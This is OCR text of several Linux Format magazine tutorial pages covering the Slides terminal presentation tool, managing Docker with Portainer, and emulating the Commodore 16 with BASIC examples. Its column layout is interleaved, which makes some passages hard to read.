S presentation. While the finished work lacks

features such as a timer or animations, it more
than makes up for it with other add-ons. For instance,
you can use different themes, and even make your own.
OUR The feature we like best is code handling. If Slides
encounters code on a slide, it can execute the code and
install command. If Go throws any errors during
installation, your installed version of Go could be the
likely culprit. The only option is to uninstall Go and then
install the latest version. The process is straightforward
and you’ll find instructions at https://go.dev/doc/install.

EXPERT display the output as part of the presentation. Creating a presentation

Shashank The beauty of Slides lies less with its features and All the slides in any given presentation are added into a
Sharma more with the ability to create presentations using single markdown file, with each new slide separated
is a trial lawyer in markdown language. HTML (HyperText Markup using three hyphens or dashes (---). You can create the
Delhi and an avid Language) is one of the most well-known markup markdown file in any editor of your choice.
Arch user. He’s languages. All processing in HTML is accomplished Here’s a sample three slide presentation that utilises
always on the using elements such <br> for line breaks, <h1>, <h2> for different style elements to create a basic presentation:
hunt for pocket- heading, </strong> for bold, etc. In comparison, you can ---
friendly geeky think of markdown as a far more lightweight markup theme: light
memorabilia.. language, which makes it easier to use. author: The Terminal Tutorial - LXF 290
---
Sliding in
You won’t find Slides in the software repositories of most # This is Heading 1, and the largest heading supported
popular desktop distributions. If you have Homebrew in markdown.
configured on your distribution, you can run the brew ## This is Heading 2. It’s smaller than Heading 1, but
install slides command to install it. The utility is also not as small as Heading 6.
distributed as a Snap package, so alternatively you can
run the sudo snap install slides command. ---
Another option is to use Go. If you already have Go # This is Heading 1, but part of the second slide.
configured on your system, download the Slides
repository from GitHub with the git clone https:// You’ll notice that the three hyphens denote a new
github.com/maaslalani/slides.git command. Next, slide.
---
A slide must
have more # This is the third slide.
content than
### It stands out from the other slides, because:
mere headings
to be processed.
A slide with 1. It has lists.
only headings is 2. This is a numbered list.
ignored. So add
a line of text, But it also has a bullet list:
a list, graph, - The hyphen is used to start a bullet list.
code, or any - This is called an unordered list.
combination - Notice the spacing arrangement here.
of these to - This is how you create a nested list.
Replace ‘~~~graph-easy --as=ascii’ with ‘~~~graph-easy --as=boxart’ if
each slide.
you want a box graph instead of an ASCII box. - This doesn’t work with numbered lists.

56 LXF290 July 2022 www.linuxformat.com

 Terminal TUTORIALS

Graphviz. Most distributions offer these in their software

repositories. For Ubuntu, you must install the libgraph-
easy-perl package, which also installs Graphviz.
Once installed, you can add the following section to a
slide to create a graph:
```
~~~graph-easy --as=ascii
[ A ] - to -> [ B ]
~~~
```
Blocks of code are defined with three tildes (~) and
each code block, including the tildes, are defined within
Open the examples/code_blocks.md file in a text editor to see how three backticks (`). The backticks are used to retain
you can add code in a slide. Then run the presentation with the ‘slides proper formatting of code blocks.
code_blocks.md’ command.
If you have any blocks on code in a markup file, you
must make the file executable by running the chmod +x
You can type this text in a file and save it as filename. filename.md command. When you now start a
md. Run the presentation with the slides filename.md presentation with the slides filename.md command,
command. Press q to exit the presentation. Slides will automatically process the slides and display
Slides supports navigation using the arrow keys, as the graphs.
well PgUp and PgDn. You can also press n, j, l or You’ll also be able to execute the code on a slide by
<num>+n, j, l to go forward n slides, use p, h, k to move pressing Ctrl+e. The output of the code execution will
backwards, or <num>+p, h, k to move backwards n then be displayed on the screen.
slides. Slides also supports searching for text to locate a
slide. Press / and type a keyword and Slides will jump to
the first slide that features the specified string. Press DOWN FOR MARKDOWN
Ctrl+n to jump to the next matching slide.
If you downloaded the Slides repository from GitHub, Markdown is a simple markup language that enables you to easily
head into the examples/ directory, which comprises format text using basic syntax elements that alter the appearance of
various sample slides. Open any of these in a text editor text in a document. For instance, **bold text** in a markdown
to view what a markdown file looks like: document is processed as bold text.
$ cd Downloads/projects/slides Let’s take a look at some of the commonly used style elements,
$ cd examples which you might wish to use in your slides before we actually discuss
$ ls how you can create a presentation with Slides.
ascii_slides.md custom_remote_theme.md import.
md preprocess.md theme.json Element Markdown
code_blocks.md custom_theme.md metadata. Bold **bold text**
md slides.md
Italics *italicized text*
$ nano slides.md
$ slides slides.md Create a bullet list -Item 1
Each slide features metadata in the footer. This -Item 2
includes the full name of the logged-in user, along with
Create a numbered list 1. First item
date and the number of current slide and total number
of slides. However, you can change this to reflect the 2. Second item
name of the event, or title of presentation, change the Heading 1 #
date format and so on. This is done by adding a Heading 2 ##
metadata block at the top of the markdown file:
Heading 3 ###
theme: theme_name
author: author name Table | Column 1 | Column 2 |
date: YYYYMMDD | ---- | ---- |
paging: Slide %d / %d
| Element | Another Element |
It’s also possible to use different themes with your
presentation. Currently, Slides supports three themes: | Second row | Second column |
ascii, dark and light. Refer to the example above to see
how we define a theme for our first presentation. You While it’s possible to do more with markdown, Slides only supports
can also create a custom theme, or use a third-party these use cases. Of course, you can also create indented lists.
theme if you prefer. The theme.json file in the You’ll find several guides and cheat sheets, as well as tutorials
examples/ directory should help you get started. online to teach you the basics of markdown. At the very least, make
sure to spend time reading through each of the markdown files in the
Codes and graphs examples directory to get a handle on the very basics of markdown
You can also include graphs in your presentation, but you must know to create meaningful presentations with Slides.
this requires external packages such as Graph-Easy and

ENHANCE YOUR TERMINAL-FU Subscribe now at http://bit.ly/LinuxFormat

www.techradar.com/pro/linux July 2022 LXF290 57
TUTORIALS Administer containers

PORTAINER
Credit: www.portainer.io

How to control Docker

over the internet
Nick Peers discovers a user-friendly, convenient and powerful way to
administer your Docker containers from wherever you happen to be.

ocker is a fantastic tool, enabling you to run all manage all the instances of Docker across your network

D kinds of applications, tools and services in self-

contained spaces without the need for a full-
from one central place, and also works with Docker
Swarm, Kubernetes and Nomad. Portainer comes in both
blown virtual machine. But controlling it from the free and paid-for editions – we’ll be focssing on the free
command line can be tricky. The obvious solution when Community Edition version in this tutorial.
OUR running Docker on a desktop is to pair it with Docker
Compose, the official GUI frontend, but what if you don’t Installing Portainer
EXPERT like Docker Compose, or you’re running Docker on a We’re assuming you already have a form of Docker
Nick Peers server with no desktop? installed on your machine – see https://docs.docker.
uses Portainer to The answer lies in Portainer (www.portainer.io) – a com/engine/install/ubuntu for details of installing it in
manage Docker web-based frontend you can use to control Docker from Ubuntu if not. Portainer ships as a Docker instance – it
on his Ubuntu any PC on your local network – or even further afield if can be run as part of a Docker Swarm or in Kubernetes
server. He bloody you pair it with a reverse proxy. Portainer’s user-friendly (see https://docs.portainer.io/v/ce-2.11/start/install for
loves it, he does. interface is packed with powerful features to make it a details), but for the purposes of this tutorial, we’ll focus
worthy alternative to Docker Compose. It can be used to on running it with a local instance of Docker.
To do this, issue these commands in the Terminal,
MONITOR YOUR CONTAINERS which assume you’ve either added your username to
the docker group or configured for rootless access. If
not, prefix the commands using sudo .
$ docker volume create portainer_data
$ docker run -d -p 8000:8000 -p 9443:9443 --name
2 5 6 portainer --restart=always -v /var/run/docker.sock:/
var/run/docker.sock -v portainer_data:/data portainer/
portainer-ce:2.11.1
Wait while the Portainer image is pulled and the
Docker instance created.
$ docker ps
The final command should confirm that Portainer is
up and running.
1 3 4
Any Portainer in a storm
If you’ve installed Portainer on the PC you’re using
now, you can access it through your web browser via
Navigation sidebar Quick actions
https://localhost:9443; otherwise, use the server’s IP
1 Use this to quickly move between the 4 Provides handy shortcuts to logs, address or computer name (say, https://192.168.0.2:
different parts of your currently selected inspection details, stats and a command 9443) from another computer on your local network.
Docker instance, and tweak Portainer settings. prompt (exec console) – just click the If you need remote access, see the Quick Tip (over the
appropriate button.
page) for accessing Portainer through a reverse proxy.
Container controls
2 Select one or more containers, then Add container When connecting locally via HTTPS, Portainer uses
perform bulk actions: start, stop, kill or restart, 5 Click this to create a new container its own self-signed SSL certificate, so you’ll immediately
pause/resume, or even remove. following the step-by-step guide over the page. see a security risk warning appear. In Firefox, click
Advanced… followed by ‘Accept the risk and continue’.
Container list Customise view
3 View a summary of all containers you’ve 6 Choose what information (Columns)
The Portainer login screen will appear, and because
set up under the current Docker instance. Sort and quick actions (Settings) are shown on the this is the first time you’ve used it, you’ll be prompted to
the list using the column headers. Container list. create your initial administrator user. For security

58 LXF290 July 2022 www.linuxformat.com

 Administer containers TUTORIALS

reasons, we’d recommend changing the admin

username and then setting a strong password following
best practice. Once done, click Create User.
The next step of the quick setup wizard enables you
to connect to other environments – include instances
of Docker running on other machines on your network
(see the box, overleaf), but assuming you’ve only the one
instance of Docker installed and running, click Get
Started to move to the home page proper.

Take the tour

Your Home page lists all environments you’re connected
to – for most this will consist of a single entry named
‘local’. You should see a little green ‘up’ label next to it,
indicating it’s running happily. You’ll also be shown a
handy summary of the stacks, containers, volumes and
images you’ve got installed with this instance of Docker,
and how many containers are currently running.
You’ll also see additional management tools – the
ability to assign individual environments to groups
and assign keyword tags. These features are more
in keeping with those who plan to manage multiple
container environments across their entire network
from a single interface (see the box for details, below).
Clicking the local entry will take you to its dashboard
– another summary screen providing a bit more detail
about this specific Docker instance – and from here you
can then click to view separate pages for your stacks,
images, networks, containers and volumes. When you
selected local, you’ll see the left-hand navigation menu
update with more convenient shortcuts to all of these.
Even if you’ve not used Docker to do anything other
than install Portainer, you’ll see at least one entry under
each of Images, Containers and Volumes, and these
correspond to the Portainer instance itself. If you’ve
already installed other containers using this installation
of Docker you’ll find they’re present too, ready to be
monitored and managed.
Select Containers and as the annotation shows you’ll
see a detailed view of what’s going on with each one,
along with some handy controls and shortcuts to useful
tools. Click a container’s name and you drill down to
another level with even more information: how long the
container’s been running, plus when it was created and
at what time it was last started.
Create containers
The fastest way to create containers in Docker is
through the Terminal – we like to store the relevant
commands in a text editor for easy editing, which can You can improve
then be copied and pasted as required. That’s all well Portainer’s drab
choice of
and good, but if you don’t have the luxury of accessing
templates by
Portainer through a desktop, you’ll be pleased to learn it plugging in a
offers all the tools you need to create your own third-party source.
containers, which include some handy time-saving Qballjos’s collection
features of their own. is this author’s
personal favourite.
First, Portainer offers 35 popular containers as
‘templates’, which come with pre-selected settings that
should work for most. Select App Templates under
Local, scroll through the list and then click one to select
it. Fill in the basic information (name, network type and
database root password if applicable), choose whether Looking to pull
to restrict access and click ‘Show advanced options’ if images from
sources other
you need to make further tweaks such as port and
than the official
volume mapping, or want to apply custom environment
DockerHub?
variables. Once done, click ‘Deploy the container’. Navigate to
The choice here is rather narrow – thankfully, Registries
Portainer makes it possible for you to add templates under Settings
from an external source. Navigate to Settings and and click Add
change the URL under App Templates to your desired registry to do
URL – try https://raw.githubusercontent.com/Qballjos/ so. Six providers
portainer_templates/master/Template/template.json can be added
(see https://github.com/Qballjos/portainer_templates quickly,
including an
for details of over 100 templates on offer) – before
authenticated
clicking Save Settings.
DockerHub
If you still can’t find what you’re looking for, or the account, or you
template doesn’t give you enough control over the can add your
setup process, follow the walkthrough to set up a own secure
container manually. By default, only containers stored in custom registry.
the DockerHub registry are accessible, but the Quick Tip
reveals how to add other repositories if needed.
One of the most time-consuming parts of creating a
container can be defining all its environment variables.

ONE GUI TO RULE THEM ALL

If you’ve installed Docker across multiple
machines, then it can provide you with a
single portal for viewing and managing
them all. When first installed, it should
automatically detect your ‘local’ Docker
instance (click Get Started to begin), but
you’ll also see an option to add other
environments too.
This option can later be accessed via
the Environments section under Settings.
Click Add environment and you’ll see
options for adding five types of
environment – select Docker to connect
to a remote Docker instance on your
network. Give it a suitably descriptive
name to help identify it and leave
‘Connect via socket’ switched off.
Next, enter your remote PC’s IP
address or DNS name into the
Environment URL field along with its
connecting port – 2375 when connecting
locally without TLS. Ignore Public IP
unless you’re connecting remotely over
the internet, and leave TLS switched off
too. Finally, click Add environment.
If you receive a connection failure
message, you’ll need to make sure TCP
port 2375 is open for listening on your
remote Docker instance – see ‘Enable
TCP port 2375 for external connection to
Docker’ under https://gist.github.com/
styblope for instructions that should
work in Ubuntu 20.04.

www.techradar.com/pro/linux July 2022 LXF290 59

TUTORIALS Administer containers

To help speed this part of the process up, Portainer gives

you three options when you come to define them. First
If you plan to is the manual option: click ‘Add an environment variable’
access Portainer then enter each name and its variable one at a time.
over the wider Second, you can load variables from an .env file, which
network, we is basically a text file containing one variable per line
recommend using the following syntax:
doing so using VARIABLE_NAME=variable value
a reverse proxy Finally, you can copy and paste multiple values
such as Swag (same syntax as for .env files) from a text or .env file by
(https://docs.
switching to Advanced mode under the Env tab. Updating your containers is as simple as clicking the Recreate button
linuxserver.
and remembering to turn on the ‘Pull latest image’ switch.
io/general/
swag). Swag Deploy, then deploy again
comes with its Once you’ve clicked Deploy, you’ll need to wait while the you visualise your container’s resource usage via a
own Portainer image is pulled before the container attempts to start. series of graphs, it also displays a list of running
conf file – Once done, Portainer will switch to the Containers processes. Exec console is your way of connecting to
see https:// screen where – all being well – you’ll see your container the container’s underlying shell via the Portainer window,
github.com/ has started successfully. If the container has a web- while Attach Console is useful if you want to restart a
linuxserver/ based interface, click the ports under Published Ports to container and see what’s going on under the hood as it
reverse-proxy- open a new tab pointing to the local address (0.0.0.0) boots without interacting with it.
confs.
and port in question, enabling you to attempt to log on
to start configuring or using your new appliance. Edit your container
If the container fails to start for any reason, or the Most problems are down to misconfiguration – consult
web logon throws up an error message when the container’s web page for detailed instructions or
attempting to connect, you’ll find Portainer offers you DuckDuckGo your container and any error messages
plenty of tools for troubleshooting your problems and you come across. To make changes to your container,
looking for potential solutions. click its entry in the Containers list to access its
You can copy and Start with the Quick Actions tools. Logs provides you Container details page. You can change ownership
paste multiple with access to what’s going on under the hood, while from here, create an image from your container as
variables at once Inspect provides an at-a-glance console to key stats a backup, change its restart policy and move the
from a text file or
other source when
(expand Config to view some of the settings you created container between available networks.
creating containers when deploying the container, including environment Should you need to make more fundamental
from scratch. variables and exposed ports). Stats doesn’t simply help changes – alter environmental variables for example –
then you’ll need to recreate the container. Thankfully
there’s a shortcut on your container’s details page: the
Duplicate/Edit button. Click this and you’ll be taken to
the ‘Add container’ page as outlined in the walkthrough,
but with your container’s current configuration pre-
filled, making it easy to tweak settings without having to
fill it in again from scratch. Leave the container name
unchanged and click ‘Deploy the container’ followed by
Replace when prompted. Duplicating the container by
giving it a new name before clicking Deploy.

Stay up to date
Portainer also makes it easy to update your containers
when new images are released. Simply select the
container under Containers to go to its dedicated page,

MANAGE DOCKER NETWORKS

Docker supports a range of networks for
your containers to use. The two main
ones are the default ‘bridge’ and a direct
‘host’ connection that binds your
container to your host’s IP address.
Configuring these – and other options,
including user-defined bridge
connections, as explained in detail at
https://docs.docker.com/network –
is tricky at the best of times, but
thankfully Portainer has you and your
containers covered.
To set up new networks and manage
existing ones, select Networks under
your environment. Click an existing
network to view key stats and see which
containers are connected to it (you can
remove them from the network from here
too), or click Add network to create a new
network using a simple form with options
from giving it a descriptive name and
selecting a driver type (bridge, ipvlan,
macvlan and overlay are all supported) to
configuring the IPv4 and/or IPv6 settings
and setting access control to limit access
to specific users and groups.
Once a network is set up, you’ll be able
to select it when creating new containers,
and switch existing containers to use the
new network. To do the latter, simply
navigate to Containers and double-click
the container’s name, then scroll down
until you reach the Connected networks
section. Here you can leave the current
network, and select any other network to
join in its place.

60 LXF290 July 2022 www.linuxformat.com

 Administer containers TUTORIALS

then click the Recreate button – this will recreate the $ docker run -d -p 8000:8000 -p 9443:9443 --name
container using its current configuration. Just be sure to portainer --restart=always -v /var/run/docker.sock:/
flick the ‘Pull latest image’ switch on before clicking the var/run/docker.sock -v portainer_data:/data portainer/ Take the time
Recreate button for a second time. portainer-ce:2.11.1 to familiarise
Although it’s a Docker instance, Portainer can’t be Portainer should restart – aside from having to log yourself with all
updated in the usual way. Keep an eye out for the ‘A new back into your account again, you should find everything of Portainer’s
version is available’ prompt on the navigation sidebar. works as it did before. features and
settings by
Click this to discover what the latest version of Portainer
bookmarking
is (2.11.1 at time of writing), then back up your current Work with users and teams https://docs.
profile by visiting Settings under Settings, scrolling One final tip: if you plan to share access to Portainer with portainer.
down and clicking Download backup to save the file others, be sure to make use of its users and groups io. Choose
(in tar.gz format) to your hard drive – just in case. function – you can allocate individuals their own log-ons ‘Portainer
Once done, open a Terminal window and issue and restrict access to specific environments, and Community
$ docker stop portainer && docker rm portainer choose whether to make them a standard user or grant Edition’ and
$ docker pull portainer/portainer-ce:2.11.1 full administrative access. Users can also be made you’ll be shown
Substitute 2.11.1 with the latest build number. members of ‘teams’, and by taking the time to set these the current
Finally, repeat the command you used to create your elements up you’re able to restrict both access to and version’s
documentation.
first Portainer instance, again updating 2.11.1 with the management of individual containers through the
latest build number: Portainer web interface.

CREATE A CONTAINER IN PORTAINER

Configure volumes Choose container image

1 If you’ve not yet done so, visit Volumes to set up any
required volumes you’ll need for your container. After giving your
volume a suitably descriptive name, click ‘add driver option’ to set
one or more mountpoints (name) and their physical location on
your drive (host). You can optionally restrict access to the volume
by user and/or team. Click ‘Create the volume’.
2 Navigate to Containers and click Add Container. Give your
container a suitably descriptive name and then search the
DockerHub registry for the application in question. If you’re not
sure what it’s called, enter a keyword into the Image box and click
Search to open a new tab. Locate your chosen image (such as
linuxserver/airsonic) and enter its name into the Image box.

Configure network ports Advanced container settings

3 Portainer can randomly allocate unused host ports to your
container. Simply flick the switch to do so; otherwise, click ‘publish
a new network port’ to manually map ports if required. Below this
is an Access Control section that enables you to restrict access to
administrators or a defined set of users and/or teams (these need
to be configured under Settings>Users).
4 This series of tabs enables you to specify other parts of
your container. Many are self-explanatory (Volumes refers to the -v
tag, Env to -e variables, and so on). Network allows you to connect
the container to the network as required – bridge by default, but
container, host and none are also available. Consult the container’s
own web page for full instructions. Click ‘Deploy the container’.

TEST OUR DEPLOYMENT SYSTEMSubscribe now at http://bit.ly/LinuxFormat

www.techradar.com/pro/linux July 2022 LXF290 61
TUTORIALS Commodore 16

YAPE
Credit: http://yape.homeserver.hu/index.htm

Emulate the classic

8-bit Commodore 16
Les Pounder revisits Commodore’s low-cost computer from the mid-80s
and finds out how it compares to its more illustrious stablemate.

hristmas 1985 in the Pounder

C household, and under the tree that

year was a Commodore. Not the
Commodore 64 – that would be under the tree
a few years from now – but a Commodore 16.
OUR The Commodore 16 was a $99 computer
designed to compete with the lower-cost
EXPERT bracket of home computers, especially the US
Les Pounder markets Timex and Texas Instruments range
is associate of machines. Powered by a MOS 7501
editor at Tom’s (0.89MHz) or a MOS 8501 CPU (1.76MHz,
Hardware and a which is the version we have) the Commodore 16 was
freelance maker. comparable, and indeed with the 8501 processor was
He blogs about faster than the Commodore 64. However, we had less
hacks and makes RAM than the C64 – a mere 16KB – of which 12KB was
at bigl.es. available to the user.
The C16 followed the same aesthetic as the C64 and
the VIC-20. It was housed in the same “bread bin” style
case and chunky keyboard, but with a dark grey colour
scheme. This has led to some C64 owners putting their
beloved machines into the C16 case because the dark
grey case isn’t prone to yellowing, unlike the C64’s.
The C16 is one of a family of computers known as
the Commodore 264 Family, which consists of the 116,
16 and Plus/4. The Commodore 16, 116 and Plus/4
would be the only models released from this range, but
others were planned and teased in the media of the era.
Resplendent in dark grey, the Commodore 16 was a failure, but every
failure has a measure of impact and it kickstarted this journalist’s love
The 116 and Plus/4 were further reduced in price. The
116 was designed to meet the price point of the
Spectrum 48K and it also featured the dreaded rubber
keys. The Plus/4 was devised as a low-cost office
machine with fast access to word processor,
spreadsheet, graphics and file management
applications stored as ROMs on the mainboard.
The Commodore 16 was a flop. It “only” managed to
ship 1.26 million units worldwide, compared with the
12 to 17 million of the $299 Commodore 64. This meant
that the Commodore 16 lasted about a year, and much
of the stock was discounted for quick sale. So let’s go
back to 1984, and learn how the Commodore 16 is a
forgotten gem that’s hiding in the shadow of the C64.

Need to stop a Get emulating

running BASIC The best emulator that we found for this task was YAPE
project and (http://yape.homeserver.hu), which is an emulator for
can’t find the the Plus/4 and Commodore 16. It may not have a GUI
RUN/STOP interface, but we can launch games and applications
key? The TAB
when we call the emulator.
key is mapped
To install YAPE visit the download page (http://yape.
to RUN/STOP.
If you need to homeserver.hu/download.htm) and select the latest
know more SDL port which should be a GitHub repository (https://
keyboard github.com/calmopyrin/yapesdl). Download the
mappings, repository and extract it to your machine. Open a
then look to terminal in the same location of the extracted files.
the terminal as Before we can build the emulator we need to install a
YAPE will print dependency, libsdl2. This is a common dependency for
the mappings the previous few emulators that we’ve installed.
for easy
Changing the colour of the border is one-up from the ol’ 10 PRINT In the terminal, update the available repositories and
reference.
project. It shows how versatile BASIC can be, if you know how to use it. then install libsdl2.

62 LXF290 July 2022 www.linuxformat.com

 Commodore 16 TUTORIALS

$ sudo apt update Our circle

$ sudo apt install libsdl2-dev generator code
has a modern-day
Now we can make the YAPE emulator.
equivalent in the
$ make form of Python
The code should build cleanly and after a few Turtle module.
moments we can run the emulator to confirm that Both can trace
everything is working. their lineage
back to the Logo
$ ./yapesdl
language of 1967.

Write some BASIC

Okay, let’s flex a little BASIC muscles. We’ve done this a
few times on many different machines but we start as
always with the ol’ 10 PRINT project. Each line of BASIC
code for a project will start with a number, 10, 20, 30
and so on. This tells the interpreter the sequence of
code: it jumps from one line to the next in ascending
order. But why do we do this? Quite simply, if we make a 16 and this will result in a different background colour
mistake and miss out a line of code we can insert being displayed:
another line of CODE without messing up the original 10 COLOR 0,1
code. Let’s do the 10 PRINT project to illustrate this. For the next line, 20 we’ll set the text colour
10 PRINT “HELLO WORLD” (character) to white (2).
20 GOTO 10 20 COLOR 1,2
If we RUN this code it will print HELLO WORLD Line 30 and we come across the GRAPHIC
over and over again. Press TAB on the keyboard to break command for the first time. With this command we can
the running code. But what if we want to add another change the format of the screen. In our project we’ll set
line? We can insert a new line between 10 and 20. the screen to high-resolution graphics mode and then
Logically this would be 11, giving us many more options clear the screen.
to expand or correct the code. But we are going to use 30 GRAPHIC 1,1
15 as this is just a simple test. For line 40 we generate a pseudo random number Writing code
10 PRINT “HELLO WORLD” between 1 and 20, then add 10 to the answer which is consumes
memory, and
15 PRINT “LXF ROOLZ” then stored in the variable, A.
12KB isn’t a lot
20 GOTO 10 40 A= RND(1)*20+ 10
of space. We
Now RUN this new code and you will see alternating Line 50 sees the start of a for loop that will rotate the can reset the
lines of HELLO WORLD and LXF ROOLZ on the circles, using the random value stored in A as a step to Commodore 16
screen. Press TAB to stop the code. iterate through the full 360 degrees. by closing the
The Commodore 16 shipped with Commodore 50 FOR L=0 TO 359 STEP A emulator and
BASIC 3.5, a higher version than was shipped with the Using the CIRCLE command we can draw circles or re-opening.
Commodore 64 (v2). The newer version of BASIC ellipses, and on line 60 we use this to draw a circle in the Alternatively,
affords a few improvements over the C64. In particular centre of the screen (160, 100 – this is the centre of the we can use the
there was the GRAPHIC command, which provided an 320x200 screen resolution) and with a 80-pixel radius NEW command
to clear the
easy way to draw on to the screen. In this project we’ll and 40-pixel height. The value of L is used as the point
memory and
draw a series of overlapping circles from the centre of angle to create a circle/ellipse, depending on the angle.
start a new
the screen. The arc of the circle is controlled using a 60 CIRCLE 1, 160, 100, 80, 40,,,L instance of
random number, so our pattern will be different each Line 70 is where the for loop iterates, repeating the the BASIC
time the code is run. code from line 50 onwards. This updates the value of L. interpreter.
We start in the YAPE emulator with line 10. This is the 70 NEXT L
COLOR command and the value of 0,1 denotes that Line 80 is a single line for loop that will iterate 2,000
we wish to change the background (0) to black (1). The times, updating the value of L and forcing the code to
value of 1 can be changed to any number between 1 and draw multiple circles.

RESOURCES USED IN THIS TUTORIAL

Research for this article involved
purchasing a Commodore 16 from eBay.
We already had some knowledge of the
Commodore 16, but Jan Beta’s repair
video (https://youtu.be/JsQs1h_WB9o)
helped us to identify common faults and
spot a deal among the “spare parts”
units. Sometimes all a machine needs is
a good clean, and a little preventative
maintenance to make sure it survives for
a few more decades.
Credit also goes to The 8-Bit Guy and communities. If you’re into the
his video on Commodore history Commodore 264 family, then this is a
(https://youtu.be/ICiZbUypMlQ). useful site for your research.
This features Bill Herd, a former On commodore.ca (https://bit.ly/
Commodore Engineer and the lead lxf290-commodore-end) we spotted a
engineer for the TED chip. great site full of information on the
Another great resource was marketing and demise of the 264
Commodore Plus/4 World (https:// machines. We also spotted a link to the
plus4world.powweb.com/home), original Commodore 16 manual, which
which was a cornucopia of information, brought back a flood of memories as we
interviews, games, demos and typed in code listings.

www.techradar.com/pro/linux July 2022 LXF290 63

TUTORIALS Commodore 16

80 FOR L=1 TO 2000: NEXT L
The final line, 90, clears the screen and returns us to
a text-only format.
90 GRAPHIC 0,1
To start the code type RUN and press ENTER. The
code will draw a series of circles/ellipses on the screen,
each time moving the starting point further around the
screen. Run the code a few times and you’ll see that the
shape of the circles/ellipses changes. This is because
they’re based on a random number.
Because this is our last BASIC project, let’s end on
another classic of the era. Changing the colour of the
border is a level up from “Hello World” and the C16’s
COLOR command makes short work of this task. We
will create a for loop that will iterate over all 16 colours,
then sneakily use another for loop to pause the code
between each colour change. There is no PAUSE, SLEEP,
WAIT command so our for loop will keep the CPU busy
for a few cycles before moving on.
If you’re carrying on from the previous BASIC project
then you’ll need to clear the memory.
NEW
Line 10 is the start of our for loop. We instruct the
loop to iterate 16 times, which is one loop for each of
the available colours.
The CPU, TED and
10 FOR I=1 TO 16
PLA chips run hot,
and replacement This time, on line 20, we use the COLOR command
chips are hard to to set the border (4) to the colour (1). We could change
come by. Adding (4) to 0 (Background), 1 (Character) or 2,4 (Multi-
just £6 worth colour). Our demo will stick with just the border (4).
of heatsinks will
help keep your
20 COLOR 4,1
chips cool. Line 30 and we use a for loop to keep the CPU busy.
This creates a pause between colour changes. By using
1 to 100 we roughly have 1/10th of a second (100ms)
between each colour change. Increase the 100 to 1000
for one second.
30 FOR T=1 TO 100
Lines 40 and 50 iterate the two for loops. The value
of T controls our delay between colour changes, and the
value of I is the border colour.
40 NEXT T
50 NEXT I
When you’re ready, type RUN and press ENTER to
start the code. Note that the screen will flash, so take
care if you or anyone watching suffer from photo-
sensitive seizures. The border will change colour and
end on a “light green” which looks more yellow to this
author’s tired old eyes.
The Commodore 16 may not be as well known as the
Commodore 64, but it’s still an excellent machine to
practise your BASIC coding exercises.
Playing games
The Commodore 16 may not have seen the success of
the Commodore 64, but it had a decent selection of
games for it. Graphics and sound were handled via the
TED (Text Editing Device) chip, which is unable to
produce sprites (unlike the C64’s VIC-II) and sound is
limited when compared to the mighty SID. Don’t let that
put you off because there are still some great games.
Looking back to our childhood, we can remember one of
the games from the C16 starter pack: Punchy. Loosely
based on Punch and Judy, a British seaside puppet
show for children which has some questionable moral
lessons, the game sees the player navigate single
screens of obstacles and traps. The platforming
element is basic and timing is often critical. Think Pitfall
but with a dash of British “comedy”.
Elsewhere, Vegas Jackpot simulates a fruit machine/
one-armed bandit where our goal is to win £100
(remember, this was the 1980s) by gambling our stake
on a series of chances. The game is simple, the music
and sound effects are basic but very nostalgic, but it has
a charm all of its own. Great fun in short bursts.
Our final game to test was Mission Mars, also known
as Cavern Raider on the VIC-20. You play a pilot,
navigating their way down a long and dangerous cavern
on Mars. There are spaceships, traps and exceedingly
tight passages to navigate. This is a difficult game and
you’ll die many times. Each death triggers the longest

THE COMMODORE 16 IN OTHER MARKETS

We touched upon the poor sales of the
Commodore 16, but it wasn’t the same
story in markets around the world. In
1986 Hungary, which didn’t manufacture
its own computers, the only choice were
Soviet (Russian), Bulgarian and (East)
German models. These machines were
very expensive, and this meant that
Commodore could swoop in and offer the
C16 at a much lower price.
From 1986 until the mid-1990s, the
Commodore 16 saw massive appeal, and
ports of Commodore 64 software were
common. Moving over the Atlantic Ocean
and to Mexico, the Commodore 16,
“Sigma-Commodore 16” saw success as
a low-cost computer for beginners.
Aurrera Supermarket sold the C16,
software peripherals and books in its
El Universo de la Computación
(The Universe of the Computer Science)
electronics department. Fans of the
C16 would gather in-store to “test” the
machines, play games and form unofficial
computer clubs where access to a
blank C60 cassette and a tape deck
would grant you your own copy of
the latest games.
The Commodore 16 spawned four
annual software competitions, where
coders could create their own demos for
sale in Mexico. A more formal and official
demoscene was backed by Aurrera.
By 1993 support was dropped for the
IBM PC, a market which has claimed
dominance in the following decades.

64 LXF290 July 2022 www.linuxformat.com


Mission Mars is a vertically scrolling shoot-em-up. Shoot the enemy
and navigate the tight caverns of Mars.
explosion outside of a Michael Bay movie.
Playing a game with YAPE is simple. In the directory
containing the YAPE emulator we open a Terminal and
invoke the command with the full path to the game that
we wish to play. The emulator can play tape (.tap), disk
(D64) and programs (PRG) files.
We played Mission Mars, ensuring that the file was in
the same directory as the emulator.
$ ./yapesdl mission_mars.prg
The game loads instantly, unlike our real-life tape
version that takes minutes to load.
The Commodore 16 today
In the two years that this series has run, we have seen
the demoscene produce some fantastic pieces of work,
and the Commodore 16 is no different. This author was
truly shocked to see what it could do. At the time this
machine lived in his bedroom and provided basic (pun
intended) entertainment before upgrading to the C64.
Promised Land, coded by Lavina and released in
2018 by The Gods of the Universe, is a tour de force of
graphics effects. Pseudo 3D objects (meatballs),
textures mapped to large “sprites”, colour cycling under
masks (plasma) – all accompanied by a techno
bassline. How this is possible with only 12KB of RAM
and 1.76MHz CPU is down to the skill of the coders. The
demo spans two disks and it can be legally downloaded
from http://plus4world.powweb.com/software/
Promised_Land.
The Commodore 16 scene is in the shadow of the
older Commodore 64, but there are plenty of machines
on offer. A quick scan (and purchase) on eBay and we
secured a C16 for £45 delivered. The seller claimed that
there was an issue, but on arrival all was good. We gave
the machine a good clean with compressed air, a stiff
paintbrush and a generous amount of isopropyl alcohol.
Boxed, mint Commodore 16s are much more
expensive, with some going for hundreds of pounds. The
C16 is a little more fragile than a C64: most notably the
CPU and chargen (Character Generator) chip are known
to run hot. We easily fixed this by purchasing three
heatsinks from Mutant Caterpillar Games. We then
checked the temperature of the chips after leaving the
